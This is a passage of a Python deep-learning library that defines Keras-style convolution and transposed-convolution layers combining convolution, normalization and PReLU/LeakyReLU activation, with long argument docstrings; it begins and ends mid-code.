compat.collect_properties(self, self.layer_norm) # for compatibility
next_shape = self.layer_norm.compute_output_shape(next_shape)
if self.high_activation == 'prelu':
shared_axes = tuple(range(1,self.rank+1))
self.layer_actv = PReLU(shared_axes=shared_axes)
self.layer_actv.build(next_shape)
compat.collect_properties(self, self.layer_actv) # for compatibility
elif self.high_activation == 'lrelu':
alpha = self.activity_config.get('alpha', 0.3)
self.layer_actv = LeakyReLU(alpha=alpha)
self.layer_actv.build(next_shape)
super(_AConv, self).build(input_shape)
def call(self, inputs):
outputs = self.layer_conv(inputs)
if self.normalization and (not self.use_bias):
outputs = self.layer_norm(outputs)
if self.high_activation in ('prelu', 'lrelu'):
outputs = self.layer_actv(outputs)
if self.use_plain_activation:
return self.activation(outputs) # pylint: disable=not-callable
return outputs
def compute_output_shape(self, input_shape):
next_shape = self.layer_conv.compute_output_shape(input_shape)
if not self.use_bias:
next_shape = self.layer_norm.compute_output_shape(next_shape)
if self.high_activation in ('prelu', 'lrelu'):
next_shape = self.layer_actv.compute_output_shape(next_shape)
return next_shape
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'lgroups': self.lgroups,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'normalization': self.normalization,
'beta_initializer': initializers.serialize(self.beta_initializer),
'gamma_initializer': initializers.serialize(self.gamma_initializer),
'beta_regularizer': regularizers.serialize(self.beta_regularizer),
'gamma_regularizer': regularizers.serialize(self.gamma_regularizer),
'beta_constraint': constraints.serialize(self.beta_constraint),
'gamma_constraint': constraints.serialize(self.gamma_constraint),
'groups': self.groups,
'activation': activations.serialize(self.activation),
'activity_config': self.activity_config,
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'_high_activation': self.high_activation
}
base_config = super(_AConv, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class AConv1D(_AConv):
"""1D convolution layer (e.g. temporal convolution).
This layer creates a convolution kernel that is convolved
with the layer input over a single spatial (or temporal) dimension
to produce a tensor of outputs.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`,
it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide an `input_shape` argument
(tuple of integers or `None`, e.g.
`(10, 128)` for sequences of 10 vectors of 128-dimensional vectors,
or `(None, 128)` for variable-length sequences of 128-dimensional vectors.
The abstract architecture of AConv1D is:
`output = activation( normalization( conv(x, W), gamma, beta ), alpha )`
This layer is a stack of convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of a single integer,
specifying the length of the 1D convolution window.
strides: An integer or tuple/list of a single integer,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Only if set, use group
convolution. The latent filter number of group convolution would
be inferred by lfilters = filters // lgroups. Hence, filters should
be a multiple of lgroups.
padding: One of `"valid"`, `"causal"` or `"same"` (case-insensitive).
`"causal"` results in causal (dilated) convolutions, e.g. output[t]
does not depend on input[t+1:]. Useful when modeling temporal data
where the model should not violate the temporal order.
See [WaveNet: A Generative Model for Raw Audio, section
2.1](https://arxiv.org/abs/1609.03499).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
dilation_rate: an integer or tuple/list of a single integer, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
kernel_initializer: Initializer for the `kernel` weights matrix.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
kernel_constraint: Constraint function applied to the kernel matrix.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
"""
def __init__(self,
filters,
kernel_size,
strides=1,
lgroups=None,
padding='valid',
data_format='channels_last',
dilation_rate=1,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv1D, self).__init__(
rank=1,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
def call(self, inputs):
if self.padding == 'causal':
inputs = array_ops.pad(inputs, self._compute_causal_padding())
return super(AConv1D, self).call(inputs)
class AConv2D(_AConv):
"""2D convolution layer (e.g. spatial convolution over images).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
The abstract architecture of AConv2D is:
`output = activation( normalization( conv(x, W), gamma, beta ), alpha )`
This layer is a stack of convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
height and width of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the height and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Only if set, use group
convolution. The latent filter number of group convolution would
be inferred by lfilters = filters // lgroups. Hence, filters should
be a multiple of lgroups.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
kernel_initializer: Initializer for the `kernel` weights matrix.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
kernel_constraint: Constraint function applied to the kernel matrix.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
lgroups=None,
padding='valid',
data_format='channels_last',
dilation_rate=(1, 1),
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv2D, self).__init__(
rank=2,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
class AConv3D(_AConv):
"""3D convolution layer (e.g. spatial convolution over volumes).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 1)` for 128x128x128 volumes
with a single channel,
in `data_format="channels_last"`.
The abstract architecture of AConv3D is:
`output = activation( normalization( conv(x, W), gamma, beta ), alpha )`
This layer is a stack of convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along each spatial
dimension.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Only if set, use group
convolution. The latent filter number of group convolution would
be inferred by lfilters = filters // lgroups. Hence, filters should
be a multiple of lgroups.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
kernel_initializer: Initializer for the `kernel` weights matrix.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
kernel_constraint: Constraint function applied to the kernel matrix.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
5D tensor with shape:
`(samples, channels, conv_dim1, conv_dim2, conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, conv_dim1, conv_dim2, conv_dim3, channels)` if
data_format='channels_last'.
Output shape:
5D tensor with shape:
`(samples, filters, new_conv_dim1, new_conv_dim2, new_conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, new_conv_dim1, new_conv_dim2, new_conv_dim3, filters)` if
data_format='channels_last'.
`new_conv_dim1`, `new_conv_dim2` and `new_conv_dim3` values might have
changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1, 1),
lgroups=None,
padding='valid',
data_format='channels_last',
dilation_rate=(1, 1, 1),
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv3D, self).__init__(
rank=3,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
class _AConvTranspose(Layer):
"""Modern transposed convolution layer (sometimes called Deconvolution).
Abstract nD transposed convolution layer (private, used as implementation base).
`_AConvTranspose` implements the operation:
`output = activation( normalization( convTranspose(x, W), gamma, beta ), alpha )`
This layer is a stack of transposed convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
rank: An integer, the rank of the convolution, e.g. "2" for 2D convolution.
filters: Integer, the dimensionality of the output space (i.e. the number
of filters in the convolution).
kernel_size: An integer or tuple/list of n integers, specifying the
length of the convolution window.
modenew: The realization mode of this layer, could be
(1) True: use upsampling-padding-conv work-flow to replace transposed
convolution.
(2) False: use plain transposed convolution.
Indeed, we recommend users to use this mode, however, users could
deactivate this mode by switch the global switch in this module.
strides: An integer or tuple/list of n integers,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Only if set, use group
convolution. The latent filter number of group convolution would
be inferred by lfilters = filters // lgroups. Hence, filters should
be a multiple of lgroups.
padding: One of `"valid"`, `"same"`.
output_mshape: (Only avaliable for new-style API) An integer or tuple/list
of the desired output shape. When setting this option, `output_padding`
and `out_cropping` would be inferred from the input shape, which means
users' options would be invalid for the following two options.
A recommended method of using this method is applying such a scheme:
`AConv(..., output_mshape=tensor.get_shape())`
output_padding: An integer or tuple/list of n integers,
specifying the amount of padding along the axes of the output tensor.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be padded.
(When using new-style API, the padding could be like ((a,b),(c,d),...)
so that you could be able to perform padding along different edges.)
out_cropping: (Only avaliable for new-style API) An integer or tuple/list
of n integers, specifying the amount of cropping along the axes of the
output tensor. The amount of output cropping along a given dimension must
be lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be cropped.
(Because this option only takes effect on new-style API, the cropping
could be like ((a,b),(c,d),...) so that you could be able to perform
cropping along different edges.)
data_format: A string, one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, ..., channels)` while `channels_first` corresponds to
inputs with shape `(batch, channels, ...)`.
dilation_rate: An integer or tuple/list of n integers, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self, rank,
filters,
kernel_size,
modenew=None,
lgroups=None,
strides=1,
padding='valid',
output_mshape=None,
output_padding=None,
output_cropping=None,
data_format=None,
dilation_rate=1,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
trainable=True,
name=None,
_high_activation=None,
**kwargs):
if 'input_shape' not in kwargs and 'input_dim' in kwargs:
kwargs['input_shape'] = (kwargs.pop('input_dim'),)
super(_AConvTranspose, self).__init__(trainable=trainable, name=name, activity_regularizer=regularizers.get(activity_regularizer), **kwargs)
# Inherit from keras.layers._Conv
self.rank = rank
if modenew is not None:
self.modenew = modenew
else:
self.modenew = _get_macro_conv()
self.filters = filters
self.lgroups = lgroups
if (lgroups is not None) and (lgroups > 1):
if not self.modenew:
raise ValueError('Transposed group convolution does not support old API, please set modenew=True or configure the macro.')
if filters % lgroups != 0:
raise ValueError('To grouplize the output channels, the output channel number should be a multiple of group number (N*{0}), but given {1}'.format(self.lgroups, self.filters))
self.kernel_size = conv_utils.normalize_tuple(
kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if (self.padding == 'causal' and not isinstance(self, AConv1D)):
raise ValueError('Causal padding is only supported for `AConv1D`.')
if output_padding is not None:
if self.modenew:
self.output_padding = output_padding
else:
self.output_padding = conv_utils.normalize_tuple(output_padding, rank, 'output_padding')
else:
self.output_padding = None
self.output_mshape = None
self.output_cropping = None
if self.modenew:
if output_mshape:
if hasattr(output_mshape, 'as_list'):
self.output_mshape = output_mshape.as_list()
else:
self.output_mshape = output_mshape
if output_cropping:
self.output_cropping = output_cropping
self.data_format = conv_utils.normalize_data_format(data_format)
if rank == 1 and self.data_format == 'channels_first':
raise ValueError('Does not support channels_first data format for 1D case due to the limitation of upsampling method.')
self.dilation_rate = conv_utils.normalize_tuple(
dilation_rate, rank, 'dilation_rate')
if (not _check_dl_func(self.dilation_rate)) and (not _check_dl_func(self.strides)):
raise ValueError('Does not support dilation_rate when strides > 1.')
self.kernel_initializer = initializers.get(kernel_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
# Inherit from mdnt.layers.normalize
self.normalization = normalization
if isinstance(normalization, str) and normalization in ('batch', 'inst', 'group'):
self.use_bias = False
self.gamma_initializer = initializers.get(gamma_initializer)
self.gamma_regularizer = regularizers.get(gamma_regularizer)
self.gamma_constraint = constraints.get(gamma_constraint)
elif normalization:
self.use_bias = True
self.gamma_initializer = None
self.gamma_regularizer = None
self.gamma_constraint = None
else:
self.use_bias = False
self.gamma_initializer = None
self.gamma_regularizer = None
self.gamma_constraint = None
self.beta_initializer = initializers.get(beta_initializer)
self.beta_regularizer = regularizers.get(beta_regularizer)
self.beta_constraint = constraints.get(beta_constraint)
self.groups = groups
# Inherit from keras.engine.Layer
if _high_activation is not None:
activation = _high_activation
self.high_activation = _high_activation
self.use_plain_activation = False
if isinstance(activation, str) and (activation.casefold() in ('prelu','lrelu')):
self.activation = activations.get(None)
self.high_activation = activation.casefold()
self.activity_config = activity_config
if activity_config is None:
self.activity_config = dict()
elif activation is not None:
self.use_plain_activation = True
self.activation = activations.get(activation)
self.activity_config = None
else:
self.activation = activations.get(None)
self.activity_config = None
self.trainable = trainable
self.input_spec = InputSpec(ndim=self.rank + 2)
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
input_shape = input_shape.with_rank_at_least(self.rank + 2)
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if self.use_bias:
bias_initializer = self.beta_initializer
bias_regularizer = self.beta_regularizer
bias_constraint = self.beta_constraint
else:
bias_initializer = None
bias_regularizer = None
bias_constraint = None
if self.modenew:
# If setting output_mshape, need to infer output_padding & output_cropping
if self.output_mshape is not None:
if not isinstance(self.output_mshape, (list, tuple)):
l_output_mshape = self.output_mshape.as_list()
else:
l_output_mshape = self.output_mshape
l_output_mshape = l_output_mshape[1:-1]
l_input_shape = input_shape.as_list()[1:-1]
self.output_padding = []
self.output_cropping = []
for i in range(self.rank):
get_shape_diff = l_output_mshape[i] - l_input_shape[i]*self.strides[i]
if get_shape_diff > 0:
b_inf = get_shape_diff // 2
b_sup = b_inf + get_shape_diff % 2
self.output_padding.append((b_inf, b_sup))
self.output_cropping.append((0, 0))
elif get_shape_diff < 0:
get_shape_diff = -get_shape_diff
b_inf = get_shape_diff // 2
b_sup = b_inf + get_shape_diff % 2
self.output_cropping.append((b_inf, b_sup))
self.output_padding.append((0, 0))
else:
self.output_cropping.append((0, 0))
self.output_padding.append((0, 0))
deFlag_padding = 0
deFlag_cropping = 0
for i in range(self.rank):
smp = self.output_padding[i]
if smp[0] == 0 and smp[1] == 0:
deFlag_padding += 1
smp = self.output_cropping[i]
if smp[0] == 0 and smp[1] == 0:
deFlag_cropping += 1
if deFlag_padding >= self.rank:
self.output_padding = None
else:
self.output_padding = tuple(self.output_padding)
if deFlag_cropping >= self.rank:
self.output_cropping = None
else:
self.output_cropping = tuple(self.output_cropping)
if self.rank == 1:
self.layer_uppool = UpSampling1D(size=self.strides[0])
self.layer_uppool.build(input_shape)
next_shape = self.layer_uppool.compute_output_shape(input_shape)
if self.output_padding is not None:
self.layer_padding = ZeroPadding1D(padding=self.output_padding)[0] # Necessary for 1D case, because we need to pick (a,b) from ((a, b))
self.layer_padding.build(next_shape)
next_shape = self.layer_padding.compute_output_shape(next_shape)
else:
self.layer_padding = None
elif self.rank == 2:
self.layer_uppool = UpSampling2D(size=self.strides, data_format=self.data_format)
self.layer_uppool.build(input_shape)
next_shape = self.layer_uppool.compute_output_shape(input_shape)
if self.output_padding is not None:
self.layer_padding = ZeroPadding2D(padding=self.output_padding, data_format=self.data_format)
self.layer_padding.build(next_shape)
next_shape = self.layer_padding.compute_output_shape(next_shape)
else:
self.layer_padding = None
elif self.rank == 3:
self.layer_uppool = UpSampling3D(size=self.strides, data_format=self.data_format)
self.layer_uppool.build(input_shape)
next_shape = self.layer_uppool.compute_output_shape(input_shape)
if self.output_padding is not None:
self.layer_padding = ZeroPadding3D(padding=self.output_padding, data_format=self.data_format)
self.layer_padding.build(next_shape)
next_shape = self.layer_padding.compute_output_shape(next_shape)
else:
self.layer_padding = None
else:
raise ValueError('Rank of the deconvolution should be 1, 2 or 3.')
if (self.lgroups is not None) and (self.lgroups > 1):
self.layer_conv = _GroupConv(rank=self.rank,
lgroups=self.lgroups,
lfilters=self.filters // self.lgroups,
kernel_size=self.kernel_size,
strides=1,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
activation=None,
use_bias=self.use_bias,
bias_initializer=bias_initializer,
bias_regularizer=bias_regularizer,
bias_constraint=bias_constraint,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
trainable=self.trainable)
else:
self.layer_conv = Conv(rank=self.rank,
filters=self.filters,
kernel_size=self.kernel_size,
strides=1,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
activation=None,
use_bias=self.use_bias,
bias_initializer=bias_initializer,
bias_regularizer=bias_regularizer,
bias_constraint=bias_constraint,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
trainable=self.trainable)
self.layer_conv.build(next_shape)
compat.collect_properties(self, self.layer_conv) # for compatibility
next_shape = self.layer_conv.compute_output_shape(next_shape)
if self.output_cropping is not None:
if self.rank == 1:
self.layer_cropping = Cropping1D(cropping=self.output_cropping)[0]
elif self.rank == 2:
self.layer_cropping = Cropping2D(cropping=self.output_cropping)
elif self.rank == 3:
self.layer_cropping = Cropping3D(cropping=self.output_cropping)
else:
raise ValueError('Rank of the deconvolution should be 1, 2 or 3.')
self.layer_cropping.build(next_shape)
next_shape = self.layer_cropping.compute_output_shape(next_shape)
else:
self.layer_cropping = None
else:
if self.rank == 1:
input_shape = input_shape[:1].concatenate([1,]).concatenate(input_shape[1:])
if self.output_padding is None:
output_padding = None
else:
output_padding = (1, *self.output_padding)
self.layer_deconv = Conv2DTranspose(filters = self.filters,
kernel_size = (1, *self.kernel_size),
strides = (1, *self.strides),
padding = self.padding,
output_padding = output_padding,
data_format = self.data_format,
dilation_rate = (1, *self.dilation_rate),
activation = None,
use_bias = self.use_bias,
bias_initializer = bias_initializer,
bias_regularizer = bias_regularizer,
bias_constraint = bias_constraint,
kernel_initializer = self.kernel_initializer,
kernel_regularizer = self.kernel_regularizer,
kernel_constraint = self.kernel_constraint,
trainable=self.trainable)
elif self.rank == 2:
self.layer_deconv = Conv2DTranspose(filters = self.filters,
kernel_size = self.kernel_size,
strides = self.strides,
padding = self.padding,
output_padding = self.output_padding,
data_format = self.data_format,
dilation_rate = self.dilation_rate,
activation = None,
use_bias = self.use_bias,
bias_initializer = bias_initializer,
bias_regularizer = bias_regularizer,
bias_constraint = bias_constraint,
kernel_initializer = self.kernel_initializer,
kernel_regularizer = self.kernel_regularizer,
kernel_constraint = self.kernel_constraint,
trainable=self.trainable)
elif self.rank == 3:
self.layer_deconv = Conv3DTranspose(filters = self.filters,
kernel_size = self.kernel_size,
strides = self.strides,
padding = self.padding,
output_padding = self.output_padding,
data_format = self.data_format,
activation = None,
use_bias = self.use_bias,
bias_initializer = bias_initializer,
bias_regularizer = bias_regularizer,
bias_constraint = bias_constraint,
kernel_initializer = self.kernel_initializer,
kernel_regularizer = self.kernel_regularizer,
kernel_constraint = self.kernel_constraint,
trainable=self.trainable)
else:
raise ValueError('Rank of the deconvolution should be 1, 2 or 3.')
self.layer_deconv.build(input_shape)
compat.collect_properties(self, self.layer_deconv) # for compatibility
next_shape = self.layer_deconv.compute_output_shape(input_shape)
if self.rank == 1:
next_shape = next_shape[:1].concatenate(next_shape[2:])
if self.normalization and (not self.use_bias):
if self.normalization.casefold() == 'batch':
self.layer_norm = BatchNormalization(axis=channel_axis,
